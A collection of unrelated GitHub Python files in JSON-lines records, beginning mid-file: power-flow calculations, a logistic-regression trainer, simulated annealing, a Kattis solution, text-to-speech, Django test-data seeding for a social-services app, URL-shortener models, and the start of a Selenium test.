partial_derivative_p_theta)\n return active_power_function, reactive_power_function\n\ndef generic_powers(system, voltages, angles):\n \"\"\"\n Returns two functions previously filled with the corresponding values for active\n and reactive powers for Newton Raphson method.\n\n Parameters\n ----------\n power_system: dict\n Dictionary containing data related to parameters needed to calculate powers.\n \"\"\"\n Vk, Vi, Gki, Bki, theta_ki = sp.symbols('Vk, Vi, Gki, Bki, theta_ki')\n active_power_function = Vk*Vi*(Gki*np.cos(theta_ki)+Bki*np.sin(theta_ki))\n reactive_power_function = Vk*Vi*(Gki*np.sin(theta_ki)-Bki*np.cos(theta_ki))\n active_power_function.evalf(subs={Vk:{1}, Vi:{1}, Gki:{}, Bki:{}, theta_ki:{}})\n reactive_power_function.evalf(subs={Vk:{1}, Vi:{1}, Gki:{}, Bki:{}, theta_ki:{}})\n # active_power = 0\n # active_powers = []\n # reactive_power = 0\n # reactive_powers = []\n buses = system['buses']\n matrix = np.zeros(shape=(len(buses), len(buses)), dtype=np.complex_)\n bars = len(voltages)\n for p_index, position in bars:\n for p_sub_index, sub_position in bars:\n active_power = active_power + (\n V[p_index]*V[p_sub_index]*(\n G[p_index][p_sub_index]*np.cos(theta[p_index][p_sub_index]) + (\n B[p_index][p_sub_index]*np.sin(theta[p_index][p_sub_index]))))\n if p_sub_index == bars:\n active_powers.append(active_power)\n active_power = 0\n else:\n continue\n for q_index, position in bars:\n for q_sub_index, sub_position in bars:\n reactive_power = reactive_power + (\n V[q_index]*V[q_sub_index]*(\n G[q_index][q_sub_index]*np.cos(theta[q_index][q_sub_index]) + (\n B[q_index][q_sub_index]*np.sin(theta[q_index][q_sub_index]))))\n if q_sub_index == bars:\n reactive_powers.append(reactive_power)\n reactive_power = 0\n else:\n continue\n return active_powers, reactive_powers\n\ndef partial_derivative(expression, respect_with, **kwargs):\n \"\"\"\n \n \"\"\"\n derivative = sp.Derivative(expression, respect_with).doit()\n derivative.evalf(subs={})\n return\n\ndef generic_jacobian(iteration):\n \"\"\"\n Returns the jacobian for a power system filled with the corresponding values\n for the partial derivatives.\n\n Parameters\n ----------\n voltages: array\n Bus voltages for the power system.\n angles: array\n Angles between buses.\n conductances: array\n Conductances for the lines.\n susceptances: array\n Susceptances for the lines.\n \"\"\"\n voltages = voltages\n angles = angles\n conductances = conductances\n susceptances = susceptances\n return\n\ndef iterative(iteration):\n \"\"\"\n Returns the approximate value for a Newton Raphson power flow solution.\n\n Parameters\n ----------\n voltages: array\n Corresponding buses voltages connected through lines with the desired bus.\n angles: array\n Corresponding angles between the desired bus and each connected bus through\n a line.\n conductances: array\n Corresponding conductance for the lines connecting the desired bus with the\n rest of the buses.\n susceptances: array\n Corresponding susceptance for the lines connecting the desired bus with the\n rest of the buses.\n \"\"\"\n voltages = voltages\n angles = angles\n conductances = conductances\n susceptances = susceptances\n return\n\nprint(\n \"\"\"\n Por favor seleccione el archivo de excel al cual desea aplicar el método de\n Newton Raphson.\n \"\"\"\n )\ninput(\"Presione enter para continuar.\")\nexcel = open_file()\ndataframes = parse_to_dataframe(excel)\n# print(dataframes[0], \"\\n\", dataframes[1], \"\\n\", dataframes[2])\nmatrices_with_contents = generate_matrices(dataframes)\npower_system = {\n \"basis\" : matrices_with_contents[0][0][0],\n \"buses\" : matrices_with_contents[1],\n \"lines\" : matrices_with_contents[2],\n \"transformers\" : matrices_with_contents[3],\n \"loads\" : matrices_with_contents[4],\n \"capacitors\" : matrices_with_contents[5],\n \"generators\" : matrices_with_contents[6]\n}\nadmittance_matrix(power_system)\ngeneric_functions()\n# for i, element in enumerate(power_system):\n # print(power_system[f\"{element}\"])\n# print(dataframes)\n# print(np.cos(3.14))\n","repo_name":"krizerator/Power-Systems","sub_path":"Power-Systems/power-systems-utilities/power_flow.py","file_name":"power_flow.py","file_ext":"py","file_size_in_byte":9824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1396778004","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport time\nimport os\nimport sys\nimport copy\nimport pickle\n\nimport numpy as np\nimport tensorflow as tf\nfrom sklearn.linear_model import LogisticRegression\n\nimport model_utils\nfrom model_utils import get_tabular_data\nimport configs\n\nfrom tensorflow.python.platform import gfile\nfrom batch_generator import BatchGenerator\n\n\n\"\"\"\nEntry point and main loop for train_net.py. Uses command line arguments to get\nmodel and training specification (see config.py).\n\"\"\"\nconfigs.DEFINE_string(\"train_datafile\",None,\"Training file\")\nconfigs.DEFINE_float(\"lr_decay\",0.9, \"Learning rate decay\")\nconfigs.DEFINE_float(\"initial_learning_rate\",1.0,\"Initial learning rate\")\nconfigs.DEFINE_float(\"validation_size\",0.0,\"Size of validation set as %\")\nconfigs.DEFINE_integer(\"passes\",1,\"Passes through day per epoch\")\nconfigs.DEFINE_integer(\"max_epoch\",0,\"Stop after max_epochs\")\nconfigs.DEFINE_integer(\"early_stop\",None,\"Early stop parameter\")\nconfigs.DEFINE_integer(\"seed\",None,\"Seed for deterministic training\")\n\nconfig = configs.get_configs()\n\ndatafile = config.train_datafile if config.train_datafile else config.datafile\n\ntrain_path = model_utils.get_data_path(config.data_dir,datafile)\n\ncache_path = os.path.splitext(train_path)[0] + '.cache'\n\nprint(\"Loading training data ...\")\n\nend_date = config.end_date\n\n############################################################################\n# If cached data doesn't exist, build it\n############################################################################\nif not os.path.exists(cache_path) or config.use_cache is False:\n print(\"Generating Data from Scratch\")\n\n config.end_date = 999901\n\n data_bg = BatchGenerator(train_path, config,\n config.batch_size, config.num_unrollings,\n validation_size=config.validation_size,\n randomly_sample=False)\n\n train_bg = data_bg.train_batches()\n valid_bg = data_bg.valid_batches()\n\n print(\"Grabbing tabular data from batch generator\")\n X_train_full, Y_train_full, dates_train = get_tabular_data(train_bg)\n X_valid_full, Y_valid_full, dates_valid = get_tabular_data(valid_bg)\n\n print(\"Saving tabular data to cache\") \n # JDA 10/27/16: Save these objects to cache here\n if not os.path.exists(cache_path):\n os.mkdir(cache_path)\n np.save(os.path.join(cache_path, 'X_train_full.npy'), X_train_full )\n np.save(os.path.join(cache_path, 'Y_train_full.npy'), Y_train_full )\n np.save(os.path.join(cache_path, 'X_valid_full.npy'), X_valid_full )\n np.save(os.path.join(cache_path, 'Y_valid_full.npy'), Y_valid_full )\n np.save(os.path.join(cache_path, 'dates_train.npy'), dates_train )\n np.save(os.path.join(cache_path, 'dates_valid.npy'), dates_valid ) \n \n############################################################################\n# Else load from cache\n############################################################################\nelse:\n print(\"Loading data from cache \"+ cache_path)\n X_train_full = np.load(os.path.join(cache_path, 'X_train_full.npy') )\n Y_train_full = np.load(os.path.join(cache_path, 'Y_train_full.npy') )\n X_valid_full = np.load(os.path.join(cache_path, 'X_valid_full.npy') )\n Y_valid_full = np.load(os.path.join(cache_path, 'Y_valid_full.npy') )\n dates_train = np.load(os.path.join(cache_path, 'dates_train.npy') )\n dates_valid = np.load(os.path.join(cache_path, 'dates_valid.npy') )\n\n#############################################################################\n# Take only those rows that finish before the end date\n#############################################################################\n\ntrain_indices = [i for i in range(len(dates_train)) if dates_train[i] <= end_date]\nvalid_indices = [i for i in range(len(dates_valid)) if dates_valid[i] <= end_date]\n\nX_train = X_train_full[train_indices]\nY_train = Y_train_full[train_indices]\nX_valid = X_valid_full[valid_indices]\nY_valid = Y_valid_full[valid_indices]\n\nprint(\"Data processing complete: end_date is %d\"%end_date)\nprint(\"X_train_full len is: %d\"%len(X_train_full))\nprint(\"X_train len is: %d\"%len(X_train))\n\n############################################################################\n# Instantiate logistic regression classifier (sk-learn) and train\n############################################################################\nclf = LogisticRegression(C=1)\nprint(\"Training logistic regression classifer\")\nclf.fit(X_train, Y_train)\n\ntraining_accuracy = np.mean(clf.predict(X_train) == Y_train)\nprint(\"training accuracy: \", training_accuracy)\n\nvalidation_accuracy = np.mean(clf.predict(X_valid) == Y_valid)\nprint(\"validation accuracy: \", validation_accuracy)\n\n############################################################################\n# Save the model\n############################################################################\nif not os.path.exists(config.model_dir):\n print(\"Creating directory %s\" % config.model_dir)\n os.mkdir(config.model_dir)\n\ncheckpoint_path = os.path.join(config.model_dir, \"logreg.pkl\" )\n\nwith open(checkpoint_path, \"wb\") as f:\n pickle.dump(clf, f)\n\n\n","repo_name":"euclidjda/dnn-quant","sub_path":"scripts/train_log_reg.py","file_name":"train_log_reg.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"37"} +{"seq_id":"22321182415","text":"import sys, getopt\n\nfrom random import random\nfrom math import exp\nfrom numpy import mean, std\n\ndef simulated_ann(kA, maxIter, x1, x2):\n # parameters\n Ts = 600\n alfa = 0.8\n\n # borders\n lB = (-10)*kA\n hB = (10)*kA\n\n # produce S\n S = [x1, x2]\n oCost = cost(S)\n\n # start iteration\n bC = 0\n curI = 1\n while curI < maxIter:\n nS = produceNeighboor(S, lB, hB)\n nCost = cost(nS)\n\n delta = nCost - oCost\n\n if delta < 0 or exp(-delta/Ts) > random():\n bC = nCost\n S = nS\n oCost = nCost\n Ts *= alfa\n curI += 1\n return bC\n\ndef produceNeighboor(s, lb, hb):\n ns = [0, 0]\n\n ns[0] = s[0] + lb+(hb-lb)*random()\n ns[1] = s[1] + lb+(hb-lb)*random()\n\n return ns\n\ndef cost(s):\n x1 = s[0]\n x2 = s[1]\n return 100*((x1**2 - x2)**2) + (1 - x1)**2\n\ndef calcAll(ck, ci, cx1, cx2):\n print(\"========================================\")\n print (\"x1:\",cx1, \" x2:\",cx2, \" kA:\",ck, \" maxI:\", ci)\n print(\"---------------------------\")\n allCost = []\n\n for i in range(30):\n allCost.append(simulated_ann(ck, ci, cx1, cx2))\n\n print(\"mean:\", mean(allCost))\n print(\"std:\", std(allCost))\n\ndef main(argv):\n ak = 0\n ai = 0\n ax1 = 0\n ax2 = 0\n\n try:\n opts, args = getopt.getopt(argv,\"hk:i:x1:x2:\",[\"ka=\",\"it=\",\"x1=\",\"x2=\"])\n except getopt.GetoptError:\n print (\"usage: simulated_ann.py -k -i --x1 --x2 \")\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n print (\"usage: simulated_ann.py -k -i --x1 --x2 \")\n sys.exit()\n elif opt in (\"-k\", \"--ka\"):\n ak = float(arg)\n elif opt in (\"-i\", \"--it\"):\n ai = int(arg)\n elif opt in (\"-x1\", \"--x1\"):\n ax1 = int(arg)\n elif opt in (\"-x2\", \"--x2\"):\n ax2 = int(arg)\n\n calcAll(ak, ai, ax1, ax2)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n\n","repo_name":"ahaltindis/optimization-algorithms","sub_path":"simulated_ann/simulated_ann.py","file_name":"simulated_ann.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35137665896","text":"\"\"\"\n/*\tTurner Atwood\n *\t9/22/18\n *\tIdentifying Map Tiles [1.7]: (https://open.kattis.com/problems/maptiles2)\n *\tTrivial math\n */\t\n\"\"\"\ndef main():\n\tquadkey = input()\n\tzoom = len(quadkey)\n\tcount = 0\n\tspot = [0,0]\n\tfor digit in quadkey[::-1]:\n\t\tdig = int(digit)\n\t\tspot = [spot[0]+dig%2*2**count, spot[1]+dig//2*2**count]\n\t\tcount += 1\n\tprint(zoom, spot[0], spot[1])\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"TurnerAtwood/Kattis","sub_path":"Trivial/IdentifyingMapTiles.py","file_name":"IdentifyingMapTiles.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"1457668843","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Mar 10 13:24:56 2021\n\n@author: Aarhon\n\"\"\"\n\nfrom gtts import gTTS \n\nimport os \ndef ttos(r):\n mytext = r\n \n language = 'en'\n \n myobj = gTTS(text=mytext, lang=language, slow=False) \n \n myobj.save(\"audio.mp3\") \nttos('How you doing')\ns='How you doin'","repo_name":"AarhonJoshuaa/Cloud_Computing","sub_path":"t_to_s.py","file_name":"t_to_s.py","file_ext":"py","file_size_in_byte":310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42026279861","text":"import os\n\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'SocialHouse.settings.dev')\n\nimport django\n\ndjango.setup()\n\nfrom datetime import datetime, timedelta\nfrom random import randint, choice\n\nfrom faker import Faker\n\nfrom django.core import management\n\nfrom applications.department.income_data.models import LivingWage, AveragePerCapitaIncome\nfrom applications.department.general_data.models import DepartmentInfo\n\nfrom applications.documentation.acts.models import SocialAct\nfrom applications.department.people.models import ServicedPerson, User, Worker, WorkerPosition\nfrom applications.department.people_data.models.serviced_data import PassportData, Privilege, PrivilegeCertificate\n\nfrom applications.social_work.services.enums import ServiceTypeEnum\nfrom applications.department.people.enums import WorkerPositionEnum\nfrom utils.datetime import range_month, random_date_between\nfrom applications.social_work.services.models import ServicesList, Service\nfrom applications.social_work.providing.models import ProvidedJournal, ProvidedService\nfrom applications.documentation.contracts.models import IPPSU, SocialContract, PaidContract\n\nfrom applications.social_work.limitations.enums import PeriodEnum\nfrom applications.social_work.limitations.models import PeriodLimitation, VolumeLimitation\n\nfrom django.conf import settings # correct way\n\nbase_dir = settings.BASE_DIR\nAPPLICATIONS_FOLDER_PATH = os.path.join(base_dir, 'applications')\nfaker = Faker(locale='ru_RU')\nPASSWORD_FOR_TEST_USERS = 'aq12wsde3'\n\n\ndef get_department_info():\n return DepartmentInfo.objects.get_or_create(\n # department_chief=WorkerPosition.objects.filter(position=WorkerPositionEnum.CHIEF).first(),\n department_title=\"отделение социального обслуживания на дому граждан пожилого возраста, \"\n \"проживающих в домах муниципального специализированного жилищного фонда, \"\n \"для социальной защиты отдельных категорий граждан\",\n department_title_short=\"отделение социального обслуживания на дому граждан пожилого возраста, \"\n \"проживающих в домах муниципального специализированного жилищного фонда, \"\n \"для социальной защиты отдельных категорий граждан\",\n\n department_address=\"р.п. Тевриз, ул. Кирова 1а\",\n\n department_address_region=\"Тевризский\",\n department_address_city=\"Тевр��з\",\n department_address_street=\"Кирова\",\n department_address_house=\"1а\",\n\n department_rooms=42,\n department_floors=2,\n\n kcson_chief=\"Ольга Васильевна КЦСОНовна\",\n kcson_chief_short=\"О.В. КЦСОНовна\",\n kcson_title=\"комплексный центр социального обслуживания населения Тевризского района\",\n kcson_title_short=\"КЦСОН Тевризского района\",\n\n )[0]\n\n\ndef generate_privileges():\n print(\"Add standard privileges\")\n privs = (\n \"Ветераны труда\",\n \"Труженики тыла\",\n \"Реабилитированные лица\",\n \"Лица, пострадавшие от политических репрессий\",\n \"Ветераны Омской области\",\n \"Герой СССР, Герой РФ, Герой Соц. труда, полный кавалер ордена Трудовой Славы и члены их семей\",\n \"Участники боевых действий и члены их семей\",\n \"Женщины-участницы Великой Отечественной войны\",\n \"Награжденные медалью 'За оборону Ленинграда', знаком 'Жителю блокадного Ленинграда'\",\n \"Лица, проживающие на территории Омской области, которым по состоянию на 9 мая 1945 года не исполнилось 18 лет и родители (один из родителей) которых в период с 22 июня 1941 года по 9 мая 1945 года погибли (пропали без вести), умерли в указанный период вследствие ранения, увечья или заболевания, полученных при защите Отечества или исполнении обязанностей военной службы на фронте, в районах боевых действий\",\n \"Члены семей погибших (умерших) инвалидов войны, участников Великой Отечественной войны и ветеранов боевых действий, члены семей погибших в Великой Отечественной войне лиц из числа личного состава групп самозащиты объектовых и аварийных команд местной противовоздушной обороны, а также члены семей погибших работников госпиталей и больниц города Ленинграда\",\n \"Пострадавшие от техногенных катастроф\",\n \"'Почетный донор России', 'Почетный донор СССР'\",\n \"Граждане, имеющие почетные звания\",\n \"Инвалиды\",\n )\n\n for p in privs:\n Privilege(title=p).save()\n\n\ndef generate_user(nick):\n user = User.objects.get_or_create(\n username=nick\n )[0]\n user.set_password(PASSWORD_FOR_TEST_USERS)\n user.save()\n return user\n\n\ndef generate_worker(status):\n user = generate_user(faker.simple_profile('M')['username'])\n\n if randint(1, 10) % 2:\n # Male\n gender = 'M'\n name = faker.first_name_male()\n patronymic = faker.middle_name_male()\n surname = faker.last_name_male()\n else:\n # Female\n gender = 'F'\n name = faker.first_name_female()\n patronymic = faker.middle_name_female()\n surname = faker.last_name_female()\n date_of_birth = faker.date_of_birth(tzinfo=None, minimum_age=25, maximum_age=55)\n\n worker = Worker.objects.get_or_create(\n user=user,\n gender=gender,\n name=name,\n patronymic=patronymic,\n surname=surname,\n date_of_birth=date_of_birth,\n status=status,\n )[0]\n worker.save()\n return worker\n\n\ndef generate_worker_position(worker=None, position=WorkerPositionEnum.SOCIAL_WORKER, is_dismiss=False):\n worker = worker or generate_worker(Worker.STATUSES[1][0])\n\n date_of_appointment = faker.date_of_birth(tzinfo=None, minimum_age=1, maximum_age=5)\n\n worker_position = WorkerPosition.objects.get_or_create(\n worker=worker,\n position=position,\n date_of_appointment=date_of_appointment,\n rate=1,\n department=get_department_info()\n )[0]\n\n if is_dismiss:\n worker_position.dismissal_date = datetime.now().date() - timedelta(days=randint(1, 180))\n worker.status = Worker.STATUSES[0][0]\n worker.save()\n worker_position.save()\n return worker_position\n\n\ndef get_all_services():\n return ServicesList.objects.last().service_set.all()\n\n\ndef create_included_services(ippsu, cnt=30):\n # not_included_services = get_all_services().by_type.guaranteed()\n not_included_services = Service.by_type.guaranteed().filter(services_list=ServicesList.objects.last())\n while cnt:\n service = choice(not_included_services)\n ippsu.included_services.add(service)\n ippsu.save()\n not_included_services = not_included_services.exclude(pk=service.pk)\n cnt -= 1\n\n\ndef generate_IPPSU(serviced_person, social_worker, date_from, date_to=None, cnt_included=30):\n ippsu = IPPSU.objects.get_or_create(\n serviced_person=serviced_person,\n executor=social_worker,\n date_from=date_from,\n department_info=get_department_info()\n )[0]\n if date_to:\n ippsu.date_expiration = date_to\n ippsu.save()\n\n create_included_services(ippsu=ippsu, cnt=cnt_included)\n return ippsu\n\n\ndef generate_contract_social(serviced_person, social_worker, date_from):\n contract = SocialContract.objects.get_or_create(\n serviced_person=serviced_person,\n executor=social_worker,\n date_from=date_from,\n serial_number=str(randint(10000, 99999)),\n department_info=get_department_info()\n )[0]\n contract.save()\n return contract\n\n\ndef generate_contract_paid(serviced_person, social_worker, date_from):\n contract = PaidContract.objects.get_or_create(\n serviced_person=serviced_person,\n executor=social_worker,\n date_from=date_from,\n serial_number=str(randint(10000, 99999)),\n department_info=get_department_info()\n )[0]\n contract.save()\n return contract\n\n\ndef create_and_fill_contracts_serviced_workers(cnt_workers=3):\n # cnt_workers = 3\n # Exclude dead and leaved\n serviced = ServicedPerson.objects.exclude(location='LE').exclude(location='DE')\n serviced_per_worker = serviced.count() // cnt_workers\n for cur_worker_number in range(cnt_workers):\n worker_position = generate_worker_position()\n for cur_serviced_number in range(serviced_per_worker):\n serviced_person = serviced[(cur_worker_number + 1) * cur_serviced_number]\n\n # Second IPPSU can be added\n # if serviced_person.date_of_income - datetime.now().date() < timedelta(days=365 * 3):\n date_from = min(serviced_person.date_of_income, datetime.now().date() - timedelta(days=365 * 3 - 54))\n ippsu = generate_IPPSU(serviced_person, worker_position, date_from=date_from, cnt_included=randint(25, 34))\n contract_social = generate_contract_social(serviced_person, social_worker=worker_position,\n date_from=date_from)\n contract_paid = generate_contract_paid(serviced_person, social_worker=worker_position, date_from=date_from)\n yield ippsu, contract_social, contract_paid\n\n\ndef pop_random_obj_from_q(queryset):\n random_obj = choice(queryset)\n queryset.exclude(pk=random_obj.id)\n return random_obj, queryset\n\n\ndef generate_provided_service(journal, service, date1, date2):\n date_of = random_date_between(date1, date2)\n volume = 1\n if service.volume_limitation:\n volume = randint(1, service.volume_limitation.limit * 2)\n quantity = 1\n if service.period_limitation:\n quantity = randint(1, service.period_limitation.limit * 2)\n # volume = randint(1, service.volume_statement.measurement.volume_statement.limit * 2)\n # quantity = randint(1, service.measurement.period_statement.limit * 2)\n fields = {\n 'journal': journal,\n 'date_of': date_of,\n 'service': service,\n 'volume': volume,\n 'quantity': quantity,\n }\n\n provided_service = ProvidedService.objects.filter(**fields)\n if provided_service.exists():\n provided_service = provided_service.first()\n else:\n provided_service = ProvidedService.objects.get_or_create(**fields)[0]\n provided_service.save()\n print(f\"\\t\\t{provided_service}\")\n\n\ndef create_and_fill_provided_services(ippsu, contract_social, contract_paid, date_from=None, date_to=None, g_count=None,\n a_count=None, p_count=None):\n # for contracts in IPPSU.objects.filter(is_archived=False):\n # TODO for many months\n # Be careful create only first and last month journal\n date_range = {range_month(date_from), range_month(date_to)}\n journals = list()\n for date1, date2 in date_range:\n\n journal = ProvidedJournal.objects.get_or_create(\n ippsu=ippsu,\n date_from=date1,\n date_to=date2,\n contract_social=contract_social,\n contract_paid=contract_paid,\n )[0]\n\n # TODO Add it as manager\n guaranteed = ippsu.included_services.all()\n additional = get_all_services().filter(type_of_service=ServiceTypeEnum.ADDITIONAL)\n paid = get_all_services().filter(type_of_service=ServiceTypeEnum.PAID)\n\n for g in range(g_count or 20):\n service, guaranteed = pop_random_obj_from_q(guaranteed)\n generate_provided_service(journal, service, date1, date2)\n for a in range(a_count or 15):\n service, additional = pop_random_obj_from_q(additional)\n generate_provided_service(journal, service, date1, date2)\n for p in range(p_count or 5):\n service, paid = pop_random_obj_from_q(paid)\n generate_provided_service(journal, service, date1, date2)\n print(f\"\\tAdd provided journal #{journal.id}_{journal.period()} to {journal.ippsu}\")\n journals.append(journal)\n return journals\n\n\ndef generate_social_act(journal: ProvidedJournal,\n living_wage: LivingWage = None, avg: AveragePerCapitaIncome = None,\n living_tax=6000, avg_tax=5000):\n date_before = journal.date_from - timedelta(days=90)\n living_wage = living_wage or LivingWage.objects.get_or_create(tax=living_tax,\n date_to=date_before)[0]\n\n avg = avg or AveragePerCapitaIncome.objects.get_or_create(\n serviced_person=journal.ippsu.serviced_person,\n date_to=date_before,\n avg_income=avg_tax\n )[0]\n return SocialAct.objects.get_or_create(\n living_wage=living_wage,\n avg_per_capita_income=avg,\n journal=journal,\n )[0]\n\n\nPICKED_ROOMS = list()\n\n\ndef generate_room_and_floor():\n dep = get_department_info()\n room = randint(0, dep.department_rooms)\n while room in PICKED_ROOMS:\n room = randint(0, dep.department_rooms)\n print(f\" Try pick: {room}\")\n PICKED_ROOMS.append(room)\n floor = (room // (dep.department_rooms // dep.department_floors)) + 1\n return room, floor\n\n\ndef generate_serviced(N=30, dead=False, left=False, location=None):\n privils = Privilege.objects.all()\n result = list()\n for i in range(N):\n name, patronymic, surname = '', '', ''\n if randint(1, 10) % 2:\n # Male\n gender = 'M'\n name = faker.first_name_male()\n patronymic = faker.middle_name_male()\n surname = faker.last_name_male()\n else:\n # Female\n gender = 'F'\n name = faker.first_name_female()\n patronymic = faker.middle_name_female()\n surname = faker.last_name_female()\n date_of_birth = faker.date_of_birth(tzinfo=None, minimum_age=50, maximum_age=98)\n contract_number = f\"№{randint(10, 99)}/{randint(10, 99)}\"\n date_of_income = faker.date_of_birth(tzinfo=None, minimum_age=0, maximum_age=2)\n\n date_of_issue = datetime(year=datetime.now().year - randint(0, 15),\n month=date_of_birth.month,\n day=date_of_birth.day)\n\n serviced = ServicedPerson(\n name=name,\n patronymic=patronymic,\n surname=surname,\n gender=gender,\n date_of_birth=date_of_birth,\n # contract_number=contract_number,\n date_of_income=date_of_income,\n # passport_data=passport\n )\n\n if dead:\n serviced.date_of_death = faker.date_of_birth(tzinfo=None, minimum_age=0, maximum_age=3)\n if left:\n serviced.date_of_departure = faker.date_of_birth(tzinfo=None, minimum_age=0, maximum_age=3)\n if location:\n serviced.location = location\n serviced.room, serviced.floor = generate_room_and_floor()\n print(f\" Pick: {serviced.address_in_department()}\")\n serviced.save()\n\n passport = PassportData.objects.get_or_create(\n issued_authority=\"ОВД Тевризского района Омской области\",\n serviced_person=serviced\n )[0]\n for _ in range(randint(randint(0, 3), 3)):\n # TODO changed privilege\n # serviced.privileges.add(choice(privils))\n cert = PrivilegeCertificate.objects.get_or_create(privilege=choice(privils), serviced_person=serviced,\n date_of=faker.date_of_birth(tzinfo=None, minimum_age=0,\n maximum_age=5))\n # serviced.privileges.add()\n serviced.save()\n\n passport.save()\n result.append(serviced)\n return result\n\n\ndef set_limits(service, volume_limit, period_limit=0, period_type=None):\n if volume_limit:\n volume_limitation = VolumeLimitation.objects.get_or_create(limit=volume_limit)[0]\n volume_limitation.save()\n service.volume_limitation = volume_limitation\n if period_limit:\n period_limitation = PeriodLimitation.objects.get_or_create(limit=period_limit, period=period_type)[0]\n period_limitation.save()\n service.period_limitation = period_limitation\n return service\n\n\ndef add_random_limits():\n print(\"Add random limits by period and volume to services\")\n all_services = get_all_services()\n guaranteed = all_services.filter(type_of_service=ServiceTypeEnum.GUARANTEED)\n period_choices = [0] * 10 + list(range(1, 5))\n volume_choices = [0] * 10 + list(range(10, 100, 10))\n period_type_choices = PeriodEnum.values\n period_type_choices.remove(None)\n for g in guaranteed:\n set_limits(\n service=g,\n volume_limit=choice(volume_choices),\n period_limit=choice(period_choices),\n period_type=choice(period_type_choices),\n ).save()\n for other in all_services.exclude(type_of_service=ServiceTypeEnum.GUARANTEED):\n set_limits(\n service=other,\n volume_limit=choice(volume_choices),\n # period_limit=choice(period_choices),\n # period_type=choice(PeriodEnum.values),\n ).save()\n\n\ndef create_superuser(login='admin', mail='admin@mail.com', password='qwerty'):\n User.objects.create_superuser(login, mail, password)\n print(\"Erase DB ended, created superuser:\\nadmin: qwerty\")\n\n\ndef flush_db(create_admin=True):\n print(\"Erase DB started\")\n management.call_command('flush', '--noinput', '--settings=SocialHouse.settings.dev')\n if create_admin:\n create_superuser()\n\n\ndef try_load_fixture(fixture_path=''):\n print(\"Trying to load data from fixture\")\n fixture_path = fixture_path or 'services_privs_and_standart_volume_limit.json'\n management.call_command('loaddata', fixture_path)\n\n\ndef load_services():\n srvs_xlsx = '..\\source_data\\services.xlsx'\n print(\"Loading services from %s\" % srvs_xlsx)\n management.call_command('services_import', '--file=' + srvs_xlsx,\n '--settings=SocialHouse.settings.dev')\n\n\ndef do_in_dir(func, path):\n def wrapper(*args, **kwargs):\n temp_path = os.path.abspath(os.curdir)\n print(f\"CurDir: {temp_path}\")\n os.chdir(path)\n print(f\"Changed to: {os.path.abspath(os.curdir)}\")\n result = func(*args, **kwargs)\n os.chdir(temp_path)\n print(f\"Return to: {os.path.abspath(os.curdir)}\")\n return result\n\n return wrapper\n","repo_name":"Kaper156/SocialHouse","sub_path":"scripts/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":19908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17429707938","text":"import os\nimport datetime\n\nfrom sqlalchemy import Table, Column, Integer, String, DateTime, create_engine, MetaData\nfrom sqlalchemy.engine.url import URL\nfrom sqlalchemy.orm import mapper\n\n\nDATABASE = {\n 'drivername': os.environ['DB_TYPE'],\n 'host': os.environ['HOST'],\n 'port': os.environ['IMAGE_PORT'],\n 'username': os.environ['POSTGRES_USER'],\n 'password': os.environ['POSTGRES_PASSWORD'],\n 'database': os.environ['POSTGRES_DB']\n}\n\nengine = create_engine(URL(**DATABASE))\nmetadata = MetaData()\n\nurl_table = Table('URL', metadata,\n Column('hash', String(255), primary_key=True),\n Column('link', String(255))\n)\n\nlogs_table = Table('Logs', metadata,\n Column('hash', String(255), primary_key=True),\n Column('time', DateTime),\n Column('IP', String(255)),\n Column('referrer', String(255))\n)\n\n\nclass Log(object):\n def __init__(self, short_link, seconds, ip, referrer):\n self.hash = short_link\n self.time = datetime.datetime.fromtimestamp(seconds)\n self.ip = ip\n self.referrer = referrer\n\n\nclass URL(object):\n def __init__(self, link, short_link):\n self.hash = short_link\n self.link = link\n\n\nmapper(URL, url_table)\nmapper(Log, logs_table)\n","repo_name":"theasder/url_shortener","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7399946096","text":"import time\n\nimport xlrd\nimport os\nimport unittest\nimport platform\nimport sys\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common import by\nfrom selenium.webdriver.common.by import By\n\noperation = platform.system()\nif operation == 'Windows':\n file_path = str(__file__).split(\"\\\\\")[-3]\nelse:\n file_path = str(__file__).split(\"/\")[-3]\n\ntry:\n from public.utils import *\n from public.auto_get_element import auto_get_element\nexcept Exception as e:\n exec(\"from my_client.%s.public.utils import *\" % file_path)\n exec(\"from my_client.%s.public.auto_get_element import *\" % file_path)\n\n\nclass Test(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.driver = webdriver.Chrome()\n cls.driver.maximize_window()\n cls.driver.implicitly_wait(5)\n\n @classmethod\n def tearDownClass(cls):\n cls.driver.quit()\n\n def setUp(self):\n util_get_index_page(self, host)\n\n def tearDown(self, method_name):\n if env == 'local':\n picture_name = \"../report/picture/%s-%s.png\" % (case_name, method_name)\n else:\n picture_name = \"uiApp/static/res_picture/%s-%s.png\" % (case_name, method_name)\n self.driver.get_screenshot_as_file(picture_name)\n\n def begin_test(self, case_date):\n '这里是用例描述'\n # 获取用例步骤 遍历判断\n steps = case_date['case_steps']\n assert_content = {}\n for step in steps:\n action = step['action']\n content = step['content']\n variable = step['variable']\n\n res = util_get_locator(self, step['locator'])\n locator = ()\n element = ''\n\n if res is not None:\n locator = res['locator']\n index = res['index']\n if 'assert_exist' in action or '断言相等' in action:\n is_exist = True\n try:\n self.driver.find_elements(*locator)[index]\n except:\n is_exist = False\n 